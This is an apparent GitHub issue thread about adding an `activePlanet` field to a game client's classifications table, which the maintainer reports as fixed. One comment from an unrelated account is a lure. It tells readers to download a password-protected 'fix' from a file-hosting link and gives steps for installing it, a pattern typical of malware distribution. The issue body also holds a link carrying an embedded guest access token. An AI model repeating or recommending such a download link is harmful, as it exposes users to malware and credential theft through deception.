### ISSUE TITLE
⚗️👁️ ↝ [SGV2-166]: Fix classifications table to add `activePlanet` field

### ISSUE THREAD

**Issue by Gizmotronn** [Signal-K/client#142]
https://signalk.atlassian.net/browse/SGV2-151?focusedCommentId=10664

> The issue is due to the roverImg classifications pointing to the image anomaly, not the parent/planet. That’s easy to fix, just add another field/configuration to classifications table!

<sub><a href="https://huly.app/guest/starsailors?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsaW5rSWQiOiI2NmNkNTZiZjhjMmMxOTBhN2E3MjVkYzUiLCJndWVzdCI6InRydWUiLCJlbWFpbCI6IiNndWVzdEBoYy5lbmdpbmVlcmluZyIsIndvcmtzcGFjZSI6InctbGlhbS1zdGFyc2FpbG9ycy02Njg5MGI1OC0yYTUyMTBjZTViLTgwOTNiYSIsInByb2R1Y3RJZCI6IiJ9.mlpPmV1VHUlGuvMQDcvlRrs49B-24dknMA1byTCAsdc">Huly&reg;: <b>STAR_-96</b></a></sub>

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gizmotronn** [comment]
Or we can just create a configuration value for `activePlanet.id` for all classificationtypes

**Comment by Gizmotronn** [comment]
Fixed!
